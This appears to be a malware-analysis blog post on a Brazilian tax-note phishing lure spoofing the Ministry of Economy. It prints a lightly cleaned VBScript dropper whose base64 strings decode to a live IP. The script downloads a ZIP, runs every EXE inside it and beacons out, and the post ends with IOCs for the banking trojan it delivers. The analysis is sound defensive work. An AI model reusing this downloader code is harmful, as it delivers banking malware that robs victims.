The other day I decided to take a walkabout in our data and explore what the rest of the world sees. And it didn’t take long to find a poorly constructed Brazilian tax note phish spoofing their Ministry of Economy. The actor failed with his phish template and switches between an invoice phish and a tax note phish.

As you have probably guessed, that link does not go to the Ministry of Economy nor is it an electronic tax note. In fact, it downloads a ZIP file containing a VBScript. The script is minimally obfuscated and rather simple, so I will only provide a stripped-down version.
Set objShellSW = CreateObject( "WScript.Shell" )
noqrtvvwyyABBDEEGIJ =objShellSW.ExpandEnvironmentStrings("%APPDATA%")
Set wshShell = CreateObject("WScript.Shell")
BBDEGIIJLNNOQQRTTV = noqrtvvwyyABBDEEGIJ +"\realteknv"
Exit_if_BBDEGIIJLNNOQQRTTV_exists
msgbox " FILE NOT FOUND " ,vbInformation,"Windows"
Dim oFSO
Set oFSO = CreateObject("Scripting.FileSystemObject")
oFSO.CreateFolder BBDEGIIJLNNOQQRTTV
Zbccgghjjlmmoqrrtu = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9ncmwv")
uuwyzBBDEGGHJJLMO = base64_decode("aHR0cDovLzMuODEuMTcwLjE5NS9iYzUyNzllOC0zNGFjLTRkMTYtYThmMi1iOWJkOTA0NDhhMC56aXA")
NPQQUUVXXZaacdffhi = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
download_payload
ZipFile = BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
ExtractTo = BBDEGIIJLNNOQQRTTV & "./"
Set fso = CreateObject("Scripting.FileSystemObject")
sourceFile = fso.GetAbsolutePathName(ZipFile)
destFolder = fso.GetAbsolutePathName(ExtractTo)
Set objShell = CreateObject("Shell.Application")
Set FilesInZip=objShell.NameSpace(sourceFile).Items()
objShell.NameSpace(destFolder).copyHere FilesInZip, 4
Set objFSOx = Createobject("Scripting.FileSystemObject")
If objFSOx.Fileexists(BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip") Then objFSOx.DeleteFile BBDEGIIJLNNOQQRTTV & "\tvvwyABBDEGGIJJL.zip"
Set objFSOw = CreateObject("Scripting.FileSystemObject")
objStartFolder = BBDEGIIJLNNOQQRTTV
Set objFolder = objFSOw.GetFolder(objStartFolder)
Set colFiles = objFolder.Files
Dim objShellLM
Set objShellLM = WScript.CreateObject( "WScript.Shell" )
For Each objFile in colFiles
If UCase(objFSOw.GetExtensionName(objFile.name)) = "EXE" Then
wyABDFFGIIJLNNOQQST = Replace(objFile.Name,".exe","")
ffgiklnnpqsstvvxy = BBDEGIIJLNNOQQRTTV & "\" & objFile.Name
objShellLM.Exec(ffgiklnnpqsstvvxy)
End If
Next
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", Zbccgghjjlmmoqrrtu, False
o.send
The script starts by base64 decoding those two strings, which decode to (1) hxxp://3.81.170[.]195/grl/ and (2) hxxp://3.81.170[.]195/bc5279e8-34ac-4d16-a8f2-b9bd90448a0.zip. Then it downloads the payload from (1), extracts the EXE from the ZIP archive, removes the extension, and executes the payload. And, finally, it sends a GET request to (2).
And what sort of goodness does that payload deliver. Well it is a Brazilian phish so you would be correct if you said generic Delphi based Brazilian banking trojan. Many anti-virus vendors label them Banload, Boleto, or Delf.
IOC | Type | Notes |
3.81.170.195 | IP Address | C2 Address |
dcd9ce1d719c4c7f3a06aaf320dd57f20fd9c228f21d56b118b1d28a726eecae | SHA256 | Zip file |
6c1708f6d07e2f947f1e9cf1df24d0ba3d43a87c58c4c066a67072daeb73c61b | SHA256 | VBScript |
1085cc04386f819f56f56ce15f63bff09336b44785ab93e7f75c073282c07e6c | SHA256 | Banking trojan |